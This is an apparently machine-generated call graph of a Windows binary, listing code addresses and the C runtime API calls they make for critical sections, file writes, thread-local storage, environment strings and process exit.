33e1905e 7452 33e19073 7407->7452 7408 33e18ff3 7408->7407 7411 33e19032 RtlDeleteCriticalSection 7408->7411 7439 33e1a09c 7408->7439 7410 33e1906a 7410->7395 7413 33e1571e 20 API calls 7411->7413 7413->7408 7415 33e19092 7414->7415 7416 33e17b64 RtlDeleteCriticalSection 7414->7416 7415->7416 7417 33e1571e 20 API calls 7415->7417 7416->7395 7416->7398 7417->7416 7419 33e18ed4 7418->7419 7428 33e15671 RtlEnterCriticalSection 7419->7428 7421 33e18f77 7433 33e18f97 7421->7433 7425 33e18f83 7425->7403 7426 33e18ee3 7426->7421 7427 33e18e78 32 API calls 7426->7427 7429 33e17b94 RtlEnterCriticalSection 7426->7429 7430 33e18f6d 7426->7430 7427->7426 7428->7426 7429->7426 7436 33e17ba8 RtlLeaveCriticalSection 7430->7436 7432 33e18f75 7432->7426 7437 33e156b9 RtlLeaveCriticalSection 7433->7437 7435 33e18f9e 7435->7425 7436->7432 7437->7435 7438->7408 7440 33e1a0a8 7439->7440 7441 33e1a0b9 7440->7441 7443 33e1a0ce 7440->7443 7442 33e16368 20 API calls 7441->7442 7445 33e1a0be 7442->7445 7451 33e1a0c9 7443->7451 7455 33e17b94 RtlEnterCriticalSection 7443->7455 7447 33e162ac 26 API calls 7445->7447 7446 33e1a0ea 7456 33e1a026 7446->7456 7447->7451 7449 33e1a0f5 7472 33e1a112 7449->7472 7451->7408 7566 33e156b9 RtlLeaveCriticalSection 7452->7566 7454 33e1907a 7454->7410 7455->7446 7457 33e1a033 7456->7457 7458 33e1a048 7456->7458 7459 33e16368 20 API calls 7457->7459 7462 33e1a043 7458->7462 7475 33e18e12 7458->7475 7461 33e1a038 7459->7461 7464 33e162ac 26 API calls 7461->7464 7462->7449 7463 33e1a05c 7465 33e1907c 20 API calls 7463->7465 7464->7462 7466 33e1a064 7465->7466 7479 33e17a5a 7466->7479 7468 33e1a06a 7486 33e1adce 7468->7486 7471 33e1571e 20 API calls 7471->7462 7565 33e17ba8 RtlLeaveCriticalSection 7472->7565 7474 33e1a11a 7474->7451 7476 33e18e2a 7475->7476 7478 33e18e26 7475->7478 7477 33e17a5a 26 API calls 7476->7477 7476->7478 7477->7478 7478->7463 7480 33e17a66 7479->7480 7481 33e17a7b 7479->7481 7482 33e16368 20 API calls 7480->7482 7481->7468 7483 33e17a6b 7482->7483 7484 33e162ac 26 API calls 7483->7484 7485 33e17a76 7484->7485 7485->7468 7487 33e1addd 7486->7487 7492 33e1adf2 7486->7492 7501 33e16355 7487->7501 7489 33e1ae2d 7490 33e16355 20 API calls 7489->7490 7493 33e1ae32 7490->7493 7492->7489 7495 33e1ae19 7492->7495 7496 33e16368 20 API calls 7493->7496 7494 33e16368 20 API calls 7498 33e1a070 7494->7498 7504 33e1ada6 7495->7504 7499 33e1ae3a 7496->7499 7498->7462 7498->7471 7500 33e162ac 26 API calls 7499->7500 7500->7498 7502 33e15b7a 20 API calls 7501->7502 7503 33e1635a 7502->7503 7503->7494 7507 33e1ad24 7504->7507 7506 33e1adca 7506->7498 7508 33e1ad30 7507->7508 7518 33e18c7b RtlEnterCriticalSection 7508->7518 7510 33e1ad3e 7511 33e1ad70 7510->7511 7512 33e1ad65 7510->7512 7514 33e16368 20 API calls 7511->7514 7519 33e1ae4d 7512->7519 7515 33e1ad6b 7514->7515 7534 33e1ad9a 7515->7534 7517 33e1ad8d 7517->7506 7518->7510 7537 33e18d52 7519->7537 7521 33e1ae63 7550 33e18cc1 7521->7550 7522 33e1ae5d 7522->7521 7524 33e1ae95 7522->7524 7527 33e18d52 26 API calls 7522->7527 7524->7521 7525 33e18d52 26 API calls 7524->7525 7528 33e1aea1 CloseHandle 7525->7528 7530 33e1ae8c 7527->7530 7528->7521 7532 33e1aead GetLastError 7528->7532 7529 33e1aedd 7529->7515 7531 33e18d52 26 API calls 7530->7531 7531->7524 7532->7521 7564 33e18c9e RtlLeaveCriticalSection 7534->7564 7536 33e1ada4 7536->7517 7538 33e18d5f 7537->7538 7539 33e18d74 7537->7539 7540 33e16355 20 API calls 7538->7540 7541 33e16355 20 API calls 7539->7541 7544 33e18d99 7539->7544 7542 33e18d64 7540->7542 7545 33e18da4 7541->7545 7543 33e16368 20 API calls 7542->7543 7546 33e18d6c 7543->7546 7544->7522 7547 33e16368 20 API calls 7545->7547 7546->7522 7548 33e18dac 7547->7548 7549 33e162ac 26 API calls 7548->7549 7549->7546 7551 33e18cd0 7550->7551 7552 33e18d37 7550->7552 7551->7552 7558 33e18cfa 7551->7558 7553 33e16368 20 API calls 7552->7553 7554 33e18d3c 7553->7554 7555 33e16355 20 API calls 7554->7555 7556 33e18d27 7555->7556 7556->7529 7559 33e16332 7556->7559 7557 33e18d21 SetStdHandle 7557->7556 7558->7556 7558->7557 7560 33e16355 20 API calls 7559->7560 7561 33e1633d 7560->7561 7562 33e16368 20 API calls 7561->7562 7563 33e16350 7562->7563 7563->7529 7564->7536 7565->7474 7566->7454 7638 33e19b0d 7639 33e19b34 7638->7639 7640 33e19b3b 7638->7640 7643 33e12ada 5 API calls 7639->7643 7641 33e19b3f 7640->7641 7642 33e19b5e 7640->7642 7644 33e16355 20 API calls 7641->7644 7645 33e19baf 7642->7645 7646 33e19b92 7642->7646 7647 33e19d15 7643->7647 7648 33e19b44 7644->7648 7649 33e19bc5 7645->7649 7689 33e1a00b 7645->7689 7651 33e16355 20 API calls 7646->7651 7650 33e16368 20 API calls 7648->7650 7692 33e196b2 7649->7692 7653 33e19b4b 7650->7653 7655 33e19b97 7651->7655 7656 33e162ac 26 API calls 7653->7656 7658 33e16368 20 API calls 7655->7658 7656->7639 7661 33e19b9f 7658->7661 7659 33e19bd3 7664 33e19bd7 7659->7664 7665 33e19bf9 7659->7665 7660 33e19c0c 7662 33e19c20 7660->7662 7663 33e19c66 WriteFile 7660->7663 7666 33e162ac 26 API calls 7661->7666 7667 33e19c56 7662->7667 7668 33e19c28 7662->7668 7669 33e19c89 GetLastError 7663->7669 7676 33e19bef 7663->7676 7675 33e19ccd 7664->7675 7699 33e19645 7664->7699 7704 33e19492 GetConsoleCP 7665->7704 7666->7639 7730 33e19728 7667->7730 7671 33e19c46 7668->7671 7672 33e19c2d 7668->7672 7669->7676 7722 33e198f5 7671->7722 7672->7675 7715 33e19807 7672->7715 7675->7639 7678 33e16368 20 API calls 7675->7678 7676->7639 7676->7675 7680 33e19ca9 7676->7680 7679 33e19cf2 7678->7679 7682 33e16355 20 API calls 7679->7682 7683 33e19cb0 7680->7683 7684 33e19cc4 7680->7684 7682->7639 7685 33e16368 20 API calls 7683->7685 7686 33e16332 20 API calls 7684->7686 7687 33e19cb5 7685->7687 7686->7639 7688 33e16355 20 API calls 7687->7688 7688->7639 7737 33e19f8d 7689->7737 7746 33e18dbc 7692->7746 7694 33e196c2 7695 33e196c7 7694->7695 7696 33e15af6 38 API calls 7694->7696 7695->7659 7695->7660 7697 33e196ea 7696->7697 7697->7695 7698 33e19708 GetConsoleMode 7697->7698 7698->7695 7702 33e1969f 7699->7702 7703 33e1966a 7699->7703 7700 33e1a181 WriteConsoleW CreateFileW 7700->7703 7701 33e196a1 GetLastError 7701->7702 7702->7676 7703->7700 7703->7701 7703->7702 7706 33e194f5 7704->7706 7709 33e19607 7704->7709 7705 33e12ada 5 API calls 7708 33e19641 7705->7708 7706->7709 7710 33e1957b WideCharToMultiByte 7706->7710 7711 33e179e6 40 API calls 7706->7711 7714 33e195d2 WriteFile 7706->7714 7755 33e17c19 7706->7755 7708->7676 7709->7705 7710->7709 7712 33e195a1 WriteFile 7710->7712 7711->7706 7712->7706 7713 33e1962a GetLastError 7712->7713 7713->7709 7714->7706 7714->7713 7719 33e19816 7715->7719 7716 33e198d8 7718 33e12ada 5 API calls 7716->7718 7717 33e19894 WriteFile 7717->7719 7720 33e198da GetLastError 7717->7720 7721 33e198f1 7718->7721 7719->7716 7719->7717 7720->7716 7721->7676 7724 33e19904 7722->7724 7723 33e19a0f 7725 33e12ada 5 API calls 7723->7725 7724->7723 7726 33e19986 WideCharToMultiByte 7724->7726 7729 33e199bb WriteFile 7724->7729 7727 33e19a1e 7725->7727 7728 33e19a07 GetLastError 7726->7728 7726->7729 7727->7676 7728->7723 7729->7724 7729->7728 7731 33e19737 7730->7731 7732 33e197ea 7731->7732 7734 33e197a9 WriteFile 7731->7734 7733 33e12ada 5 API calls 7732->7733 7735 33e19803 7733->7735 7734->7731 7736 33e197ec GetLastError 7734->7736 7735->7676 7736->7732 7738 33e18d52 26 API calls 7737->7738 7739 33e19f9f 7738->7739 7740 33e19fa7 7739->7740 7741 33e19fb8 SetFilePointerEx 7739->7741 7743 33e16368 20 API calls 7740->7743 7742 33e19fd0 GetLastError 7741->7742 7745 33e19fac 7741->7745 7744 33e16332 20 API calls 7742->7744 7743->7745 7744->7745 7745->7649 7747 33e18dc9 7746->7747 7749 33e18dd6 7746->7749 7748 33e16368 20 API calls 7747->7748 7750 33e18dce 7748->7750 7751 33e18de2 7749->7751 7752 33e16368 20 API calls 7749->7752 7750->7694 7751->7694 7753 33e18e03 7752->7753 7754 33e162ac 26 API calls 7753->7754 7754->7750 7756 33e15af6 38 API calls 7755->7756 7757 33e17c24 7756->7757 7758 33e17a00 38 API calls 7757->7758 7759 33e17c34 7758->7759 7759->7706 6010 33e1220c 6011 33e12215 6010->6011 6012 33e1221a 6010->6012 6024 33e122b1 6011->6024 6016 33e120db 6012->6016 6015 33e12228 6017 33e120e7 6016->6017 6020 33e1210b 6017->6020 6023 33e120f6 6017->6023 6028 33e11eec 6017->6028 6019 33e1216d 6021 33e11eec 50 API calls 6019->6021 6019->6023 6020->6019 6022 33e11eec 50 API calls 6020->6022 6020->6023 6021->6023 6022->6019 6023->6015 6025 33e122c7 6024->6025 6027 33e122d0 6025->6027 6443 33e12264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6025->6443 6027->6012 6029 33e11ef7 6028->6029 6030 33e11f2a 6028->6030 6032 33e11f1c 6029->6032 6033 33e11efc 6029->6033 6071 33e12049 6030->6071 6053 33e11f3f 6032->6053 6035 33e11f01 6033->6035 6036 33e11f12 6033->6036 6039 33e11f06 6035->6039 6040 33e1240b 6035->6040 6045 33e123ec 6036->6045 6039->6020 6085 33e153e5 6040->6085 6194 33e13513 6045->6194 6048 33e123f5 6048->6039 6051 33e12408 6051->6039 6052 33e1351e 7 API calls 6052->6048 6054 33e11f4b 6053->6054 6212 33e1247c 6054->6212 6056 33e11f52 6057 33e12041 6056->6057 6058 33e11f7c 6056->6058 6065 33e11f57 6056->6065 6239 33e12639 IsProcessorFeaturePresent 6057->6239 6223 33e123de 6058->6223 6061 33e12048 6062 33e11f8b 6062->6065 6226 33e122fc RtlInitializeSListHead 6062->6226 6064 33e11f99 6227 33e146c5 6064->6227 6065->6039 6069 33e11fb8 6069->6065 6235 33e14669 6069->6235 6073 33e12055 6071->6073 6072 33e1205e 6072->6039 6073->6072 6074 33e120d3 6073->6074 6075 33e1207d 6073->6075 6076 33e12639 4 API calls 6074->6076 6316 33e1244c 6075->6316 6078 33e120da 6076->6078 6079 33e12082 6325 33e12308 6079->6325 6081 33e12087 6328 33e120c4 6081->6328 6083 33e1209f 6331 33e1260b 6083->6331 6091 33e15aca 6085->6091 6088 33e1351e 6165 33e13820 6088->6165 6090 33e12415 6090->6039 6092 33e12410 6091->6092 6093 33e15ad4 6091->6093 6092->6088 6094 33e15e08 11 API calls 6093->6094 6095 33e15adb 6094->6095 6095->6092 6096 33e15e5e 11 API calls 6095->6096 6097 33e15aee 6096->6097 6099 33e159b5 6097->6099 6100 33e159c0 6099->6100 6101 33e159d0 6099->6101 6105 33e159d6 6100->6105 6101->6092 6104 33e1571e 20 API calls 6104->6101 6106 33e159ef 6105->6106 6107 33e159e9 6105->6107 6109 33e1571e 20 API calls 6106->6109 6108 33e1571e 20 API calls 6107->6108 6108->6106 6110 33e159fb 6109->6110 6111 33e1571e 20 API calls 6110->6111 6112 33e15a06 6111->6112 6113 33e1571e 20 API calls 6112->6113 6114 33e15a11 6113->6114 6115 33e1571e 20 API calls 6114->6115 6116 33e15a1c 6115->6116 6117 33e1571e 20 API calls 6116->6117 6118 33e15a27 6117->6118 6119 33e1571e 20 API calls 6118->6119 6120 33e15a32 6119->6120 6121 33e1571e 20 API calls 6120->6121 6122 33e15a3d 6121->6122 6123 33e1571e 20 API calls 6122->6123 6124 33e15a48 6123->6124 6125 33e1571e 20 API calls 6124->6125 6126 33e15a56 6125->6126 6131 33e1589c 6126->6131 6137 33e157a8 6131->6137 6133 33e158c0 6134 33e158ec 6133->6134 6149 33e15809 6134->6149 6136 33e15910 6136->6104 6138 33e157b4 6137->6138 6145 33e15671 RtlEnterCriticalSection 6138->6145 6140 33e157be 6141 33e157e8 6140->6141 6144 33e1571e 20 API calls 6140->6144 6146 33e157fd 6141->6146 6143 33e157f5 6143->6133 6144->6141 6145->6140 6147 33e156b9 RtlLeaveCriticalSection 6146->6147 6148 33e15807 6147->6148 6148->6143 6150 33e15815 6149->6150 6157 33e15671 RtlEnterCriticalSection 6150->6157 6152 33e1581f 6158 33e15a7f 6152->6158 6154 33e15832 6162 33e15848 6154->6162 6156 33e15840 6156->6136 6157->6152 6159 33e15ab5 6158->6159 6160 33e15a8e 6158->6160 6159->6154 6160->6159 6161 33e17cc2 20 API calls 6160->6161 6161->6159 6163 33e156b9 RtlLeaveCriticalSection 6162->6163 6164 33e15852 6163->6164 6164->6156 6166 33e1384b 6165->6166 6167 33e1382d 6165->6167 6166->6090 6170 33e1383b 6167->6170 6171 33e13b67 6167->6171 6176 33e13ba2 6170->6176 6181 33e13a82 6171->6181 6173 33e13b81 6174 33e13b99 TlsGetValue 6173->6174 6175 33e13b8d 6173->6175 6174->6175 6175->6170 6177 33e13a82 5 API calls 6176->6177 6178 33e13bbc 6177->6178 6179 33e13bd7 TlsSetValue 6178->6179 6180 33e13bcb 6178->6180 6179->6180 6180->6166 6182 33e13aaa 6181->6182 6186 33e13aa6 6181->6186 6182->6186 6187 33e139be 6182->6187 6185 33e13ac4 GetProcAddress 6185->6186 6186->6173 6192 33e139cd 6187->6192 6188 33e13a77 6188->6185 6188->6186 6189 33e139ea LoadLibraryExW 6190 33e13a05 GetLastError 6189->6190 6189->6192 6190->6192 6191 33e13a60 FreeLibrary 6191->6192 6192->6188 6192->6189 6192->6191 6193 33e13a38 LoadLibraryExW 6192->6193 6193->6192 6200 33e13856 6194->6200 6196 33e123f1 6196->6048 6197 33e153da 6196->6197 6198 33e15b7a 20 API calls 6197->6198 6199 33e123fd 6198->6199 6199->6051 6199->6052 6201 33e13862 GetLastError 6200->6201 6202 33e1385f 6200->6202 6203 33e13b67 6 API calls 6201->6203 6202->6196 6204 33e13877 6203->6204 6205 33e138dc SetLastError 6204->6205 6206 33e13ba2 6 API calls 6204->6206 6211 33e13896 6204->6211 6205->6196 6207 33e13890 6206->6207 6208 33e138b8 6207->6208 6210 33e13ba2 6 API calls 6207->6210 6207->6211 6209 33e13ba2 6 API calls 6208->6209 6208->6211 6209->6211 6210->6208 6211->6205 6213 33e12485 6212->6213 6243 33e12933 IsProcessorFeaturePresent 6213->6243 6217 33e12496 6218 33e1249a 6217->6218 6254 33e153c8 6217->6254 6218->6056 6221 33e124b1 6221->6056 6310 33e124b5 6223->6310 6225 33e123e5 6225->6062 6226->6064 6228 33e146dc 6227->6228 6229 33e12ada 5 API calls 6228->6229 6230 33e11fad 6229->6230 6230->6065 6231 33e123b3 6230->6231 6232 33e123b8 6231->6232 6233 33e12933 IsProcessorFeaturePresent 6232->6233 6234 33e123c1 6232->6234 6233->6234 6234->6069 6238 33e14698 6235->6238 6236 33e12ada 5 API calls 6237 33e146c1 6236->6237 6237->6065 6238->6236 6240 33e1264e 6239->6240 6241 33e126f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6240->6241 6242 33e12744 6241->6242 6242->6061 6244 33e12491 6243->6244 6245 33e134ea 6244->6245 6246 33e134ef 6245->6246 6265 33e13936 6246->6265 6250 33e13505 6251 33e13510 6250->6251 6279 33e13972 6250->6279 6251->6217 6253 33e134fd 6253->6217 6302 33e17457 6254->6302 6257 33e13529 6258 33e13532 6257->6258 6264 33e13543 6257->6264 6259 33e1391b 6 API calls 6258->6259 6260 33e13537 6259->6260 6261 33e13972 RtlDeleteCriticalSection 6260->6261 6262 33e1353c 6261->6262 6306 33e13c50 6262->6306 6264->6218 6266 33e1393f 6265->6266 6268 33e13968 6266->6268 6270 33e134f9 6266->6270 6283 33e13be0 6266->6283 6269 33e13972 RtlDeleteCriticalSection 6268->6269 6269->6270 6270->6253 6271 33e138e8 6270->6271 6288 33e13af1 6271->6288 6274 33e138fd 6274->6250 6275 33e13ba2 6 API calls 6276 33e1390b 6275->6276 6277 33e13918 6276->6277 6293 33e1391b 6276->6293 6277->6250 6280 33e1399c 6279->6280 6281 33e1397d 6279->6281 6280->6253 6282 33e13987 RtlDeleteCriticalSection 6281->6282 6282->6280 6282->6282 6284 33e13a82 5 API calls 6283->6284 6285 33e13bfa 6284->6285 6286 33e13c18 InitializeCriticalSectionAndSpinCount 6285->6286 6287 33e13c03 6285->6287 6286->6287 6287->6266 6289 33e13a82 5 API calls 6288->6289 6290 33e13b0b 6289->6290 6291 33e13b24 TlsAlloc 6290->6291 6292 33e138f2 6290->6292 6292->6274 6292->6275 6294 33e1392b 6293->6294 6295 33e13925 6293->6295 6294->6274 6297 33e13b2c 6295->6297 6298 33e13a82 5 API calls 6297->6298 6299 33e13b46 6298->6299 6300 33e13b52 6299->6300 6301 33e13b5e TlsFree 6299->6301 6300->6294 6301->6300 6305 33e17470 6302->6305 6303 33e12ada 5 API calls 6304 33e124a3 6303->6304 6304->6221 6304->6257 6305->6303 6307 33e13c7f 6306->6307 6308 33e13c59 6306->6308 6307->6264 6308->6307 6309 33e13c69 FreeLibrary 6308->6309 6309->6308 6311 33e124c4 6310->6311 6312 33e124c8 6310->6312 6311->6225 6313 33e124d5 6312->6313 6314 33e12639 4 API calls 6312->6314 6313->6225 6315 33e12559 6314->6315 6317 33e12451 6316->6317 6318 33e12455 6317->6318 6321 33e12461 6317->6321 6337 33e1527a 6318->6337 6322 33e1246e 6321->6322 6340 33e1499b 6321->6340 6322->6079 6415 33e134c7 RtlInterlockedFlushSList 6325->6415 6327 33e12312 6327->6081 6417 33e1246f 6328->6417 6330 33e120c9 6330->6083 6332 33e12617 6331->6332 6333 33e1262d 6332->6333 6436 33e153ed 6332->6436 6333->6072 6336 33e13529 8 API calls 6336->6333 6362 33e15132 6337->6362 6341 33e149a7 6340->6341 6342 33e149bf 6341->6342 6384 33e14af5 GetModuleHandleW 6341->6384 6393 33e15671 RtlEnterCriticalSection 6342->6393 6346 33e14a65 6394 33e14aa5 6346->6394 6350 33e14a3c 6353 33e14a54 6350->6353 6358 33e14669 5 API calls 6350->6358 6351 33e14a82 6397 33e14ab4 6351->6397 6352 33e14aae 6405 33e1bdc9 6352->6405 6359 33e14669 5 API calls 6353->6359 6354 33e149c7 6354->6346 6354->6350 6356 33e1527a 20 API calls 6354->6356 6356->6350 6358->6353 6359->6346 6365 33e150e1 6362->6365 6364 33e1245f 6364->6079 6366 33e150ed 6365->6366 6373 33e15671 RtlEnterCriticalSection 6366->6373 6368 33e150fb 6374 33e1515a 6368->6374 6372 33e15119 6372->6364 6373->6368 6375 33e1517a 6374->6375 6379 33e15182 6374->6379 6376 33e12ada 5 API calls 6375->6376 6377 33e15108 6376->6377 6380 33e15126 6377->6380 6378 33e1571e 20 API calls 6378->6375 6379->6375 6379->6378 6383 33e156b9 RtlLeaveCriticalSection 6380->6383 6382 33e15130 6382->6372 6383->6382 6385 33e149b3 6384->6385 6385->6342 6386 33e14b39 GetModuleHandleExW 6385->6386 6387 33e14b63 GetProcAddress 6386->6387 6388 33e14b78 6386->6388 6387->6388 6389 33e14b95 6388->6389 6390 33e14b8c FreeLibrary 6388->6390 6391 33e12ada 5 API calls 6389->6391 6390->6389 6392 33e14b9f 6391->6392 6392->6342 6393->6354 6408 33e156b9 RtlLeaveCriticalSection 6394->6408 6396 33e14a7e 6396->6351 6396->6352 6409 33e16025 6397->6409 6400 33e14ae2 6403 33e14b39 8 API calls 6400->6403 6401 33e14ac2 GetPEB 6401->6400 6402 33e14ad2 GetCurrentProcess TerminateProcess 6401->6402 6402->6400 6404 33e14aea ExitProcess 6403->6404 6406 33e12ada 5 API calls 6405->6406 6407 33e1bdd4 6406->6407 6407->6407 6408->6396 6410 33e16040 6409->6410 6411 33e1604a 6409->6411 6413 33e12ada 5 API calls 6410->6413 6412 33e15c45 5 API calls 6411->6412 6412->6410 6414 33e14abe 6413->6414 6414->6400 6414->6401 6416 33e134d7 6415->6416 6416->6327 6422 33e153ff 6417->6422 6420 33e1391b 6 API calls 6421 33e1354d 6420->6421 6421->6330 6425 33e15c2b 6422->6425 6426 33e12476 6425->6426 6427 33e15c35 6425->6427 6426->6420 6429 33e15db2 6427->6429 6430 33e15c45 5 API calls 6429->6430 6431 33e15dd9 6430->6431 6432 33e15df1 TlsFree 6431->6432 6434 33e15de5 6431->6434 6432->6434 6433 33e12ada 5 API calls 6435 33e15e02 6433->6435 6434->6433 6435->6426 6439 33e174da 6436->6439 6440 33e174f3 6439->6440 6441 33e12ada 5 API calls 6440->6441 6442 33e12625 6441->6442 6442->6336 6443->6027 7567 33e1284f 7570 33e12882 7567->7570 7573 33e13550 7570->7573 7572 33e1285d 7574 33e1358a 7573->7574 7575 33e1355d 7573->7575 7574->7572 7575->7574 7575->7575 7576 33e147e5 21 API calls 7575->7576 7577 33e1357a 7576->7577 7577->7574 7578 33e1544d 26 API calls 7577->7578 7578->7574 7579 33e1724e GetProcessHeap 7580 33e15351 7581 33e15360 7580->7581 7582 33e15374 7580->7582 7581->7582 7585 33e1571e 20 API calls 7581->7585 7583 33e1571e 20 API calls 7582->7583 7584 33e15386 7583->7584 7586 33e1571e 20 API calls 7584->7586 7585->7582 7587 33e15399 7586->7587 7588 33e1571e 20 API calls 7587->7588 7589 33e153aa 7588->7589 7590 33e1571e 20 API calls 7589->7590 7591 33e153bb 7590->7591 6695 33e136d0 6696 33e136e2 6695->6696 6698 33e136f0 6695->6698 6697 33e12ada 5 API calls 6696->6697 6697->6698 7300 33e13c90 RtlUnwind 6699 33e173d5 6700 33e173e1 6699->6700 6711 33e15671 RtlEnterCriticalSection 6700->6711 6702 33e173e8 6712 33e18be3 6702->6712 6704 33e173f7 6710 33e17406 6704->6710 6725 33e17269 GetStartupInfoW 6704->6725 6707 33e17417 6736 33e17422 6710->6736 6711->6702 6713 33e18bef 6712->6713 6714 33e18c13 6713->6714 6715 33e18bfc 6713->6715 6739 33e15671 RtlEnterCriticalSection 6714->6739 6716 33e16368 20 API calls 6715->6716 6718 33e18c01 6716->6718 6720 33e162ac 26 API calls 6718->6720 6719 33e18c1f 6724 33e18c4b 6719->6724 6740 33e18b34 6719->6740 6722 33e18c0b 6720->6722 6722->6704 6747 33e18c72 6724->6747 6726 33e17286 6725->6726 6727 33e17318 6725->6727 6726->6727 6728 33e18be3 27 API calls 6726->6728 6731 33e1731f 6727->6731 6729 33e172af 6728->6729 6729->6727 6730 33e172dd GetFileType 6729->6730 6730->6729 6732 33e17326 6731->6732 6733 33e17369 GetStdHandle 6732->6733 6734 33e173d1 6732->6734 6735 33e1737c GetFileType 6732->6735 6733->6732 6734->6710 6735->6732 6758 33e156b9 RtlLeaveCriticalSection 6736->6758 6738 33e17429 6738->6707 6739->6719 6741 33e1637b 20 API calls 6740->6741 6742 33e18b46 6741->6742 6746 33e18b53 6742->6746 6750 33e15eb7 6742->6750 6743 33e1571e 20 API calls 6744 33e18ba5 6743->6744 6744->6719 6746->6743 6757 33e156b9 RtlLeaveCriticalSection 6747->6757 6749 33e18c79 6749->6722 6751 33e15c45 5 API calls 6750->6751 6752 33e15ede 6751->6752 6753 33e15ee7 6752->6753 6754 33e15efc InitializeCriticalSectionAndSpinCount 6752->6754 6755 33e12ada 5 API calls 6753->6755 6754->6753 6756 33e15f13 6755->6756 6756->6742 6757->6749 6758->6738 6759 33e14ed7 6770 33e16d60 6759->6770 6764 33e14ef4 6766 33e1571e 20 API calls 6764->6766 6767 33e14f29 6766->6767 6768 33e14eff 6769 33e1571e 20 API calls 6768->6769 6769->6764 6771 33e16d69 6770->6771 6772 33e14ee9 6770->6772 6803 33e16c5f 6771->6803 6774 33e17153 GetEnvironmentStringsW 6772->6774 6775 33e1716a 6774->6775 6785 33e171bd 6774->6785 6778 33e17170 WideCharToMultiByte 6775->6778 6776 33e171c6 FreeEnvironmentStringsW 6777 33e14eee 6776->6777 6777->6764 6786 33e14f2f 6777->6786 6779 33e1718c 6778->6779 6778->6785 6780 33e156d0 21 API calls 6779->6780 6781 33e17192 6780->6781 6782 33e171af 6781->6782 6783 33e17199 WideCharToMultiByte 6781->6783 6784 33e1571e 20 API calls 6782->6784 6783->6782 6784->6785 6785->6776 6785->6777 6787 33e14f44 6786->6787 6788 33e1637b 20 API calls 6787->6788 6797 33e14f6b 6788->6797 6789 33e1571e 20 API calls 6790 33e14fe9 6789->6790 6790->6768 6791 33e1637b 20 API calls 6791->6797 6792 33e14fd1 7103 33e15000 6792->7103 6796 33e14ff3 6799 33e162bc 11 API calls 6796->6799 6797->6791 6797->6792 6797->6796 6800 33e1571e 20 API calls 6797->6800 6801 33e14fcf 6797->6801 7094 33e1544d 6797->7094 6798 33e1571e 20 API calls 6798->6801 6802 33e14fff 6799->6802 6800->6797 6801->6789 6823 33e15af6 GetLastError 6803->6823 6805 33e16c6c 6843 33e16d7e 6805->6843 6807 33e16c74 6852 33e169f3 6807->6852 6812 33e16cce 6815 33e1571e 20 API calls 6812->6815 6817 33e16c8b 6815->6817 6816 33e16cc9 6818 33e16368 20 API calls 6816->6818 6817->6772 6818->6812 6819 33e16d12 6819->6812 6876 33e168c9 6819->6876 6820 33e16ce6 6820->6819 6821 33e1571e 20 API calls 6820->6821 6821->6819 6824 33e15b12 6823->6824 6825 33e15b0c 6823->6825 6826 33e1637b 20 API calls 6824->6826 6829 33e15b61 SetLastError 6824->6829 6827 33e15e08 11 API calls 6825->6827 6828 33e15b24 6826->6828 6827->6824 6830 33e15b2c 6828->6830 6831 33e15e5e 11 API calls 6828->6831 6829->6805 6832 33e1571e 20 API calls 6830->6832 6833 33e15b41 6831->6833 6834 33e15b32 6832->6834 6833->6830 6835 33e15b48 6833->6835 6836 33e15b6d SetLastError 6834->6836 6837 33e1593c 20 API calls 6835->6837 6879 33e155a8 6836->6879 6839 33e15b53 6837->6839 6841 33e1571e 20 API calls 6839->6841 6842 33e15b5a 6841->6842 6842->6829 6842->6836 6844 33e16d8a 6843->6844 6845 33e15af6 38 API calls 6844->6845 6850 33e16d94 6845->6850 6847 33e16e18 6847->6807 6849 33e155a8 38 API calls 6849->6850 6850->6847 6850->6849 6851 33e1571e 20 API calls 6850->6851 6947 33e15671 RtlEnterCriticalSection 6850->6947 6948 33e16e0f 6850->6948 6851->6850 6952 33e154a7 6852->6952 6855 33e16a14 GetOEMCP 6858 33e16a3d 6855->6858 6856 33e16a26 6857 33e16a2b GetACP 6856->6857 6856->6858 6857->6858 6858->6817 6859 33e156d0 6858->6859 6860 33e1570e 6859->6860 6861 33e156de 6859->6861 6862 33e16368 20 API calls 6860->6862 6861->6860 6863 33e156f9 RtlAllocateHeap 6861->6863 6865 33e1474f 7 API calls 6861->6865 6864 33e1570c 6862->6864 6863->6861 6863->6864 6864->6812 6866 33e16e20 6864->6866 6865->6861 6867 33e169f3 40 API calls 6866->6867 6868 33e16e3f 6867->6868 6871 33e16e90 IsValidCodePage 6868->6871 6873 33e16e46 6868->6873 6875 33e16eb5 6868->6875 6869 33e12ada 5 API calls 6870 33e16cc1 6869->6870 6870->6816 6870->6820 6872 33e16ea2 GetCPInfo 6871->6872 6871->6873 6872->6873 6872->6875 6873->6869 6985 33e16acb GetCPInfo 6875->6985 7058 33e16886 6876->7058 6878 33e168ed 6878->6812 6890 33e17613 6879->6890 6882 33e155b8 6884 33e155c2 IsProcessorFeaturePresent 6882->6884 6889 33e155e0 6882->6889 6886 33e155cd 6884->6886 6888 33e160e2 8 API calls 6886->6888 6888->6889 6920 33e14bc1 6889->6920 6923 33e17581 6890->6923 6893 33e1766e 6894 33e1767a 6893->6894 6895 33e15b7a 20 API calls 6894->6895 6899 33e176a7 6894->6899 6903 33e176a1 6894->6903 6895->6903 6896 33e176f3 6897 33e16368 20 API calls 6896->6897 6898 33e176f8 6897->6898 6900 33e162ac 26 API calls 6898->6900 6901 33e1771f 6899->6901 6937 33e15671 RtlEnterCriticalSection 6899->6937 6904 33e176d6 6900->6904 6908 33e1777e 6901->6908 6910 33e17776 6901->6910 6917 33e177a9 6901->6917 6938 33e156b9 RtlLeaveCriticalSection 6901->6938 6902 33e1bdc9 5 API calls 6906 33e17875 6902->6906 6903->6896 6903->6899 6903->6904 6904->6902 6906->6882 6908->6917 6939 33e17665 6908->6939 6912 33e14bc1 28 API calls 6910->6912 6912->6908 6914 33e15af6 38 API calls 6918 33e1780c 6914->6918 6916 33e17665 38 API calls 6916->6917 6942 33e1782e 6917->6942 6918->6904 6919 33e15af6 38 API calls 6918->6919 6919->6904 6921 33e1499b 28 API calls 6920->6921 6922 33e14bd2 6921->6922 6926 33e17527 6923->6926 6925 33e155ad 6925->6882 6925->6893 6927 33e17533 6926->6927 6932 33e15671 RtlEnterCriticalSection 6927->6932 6929 33e17541 6933 33e17575 6929->6933 6931 33e17568 6931->6925 6932->6929 6936 33e156b9 RtlLeaveCriticalSection 6933->6936 6935 33e1757f 6935->6931 6936->6935 6937->6901 6938->6910 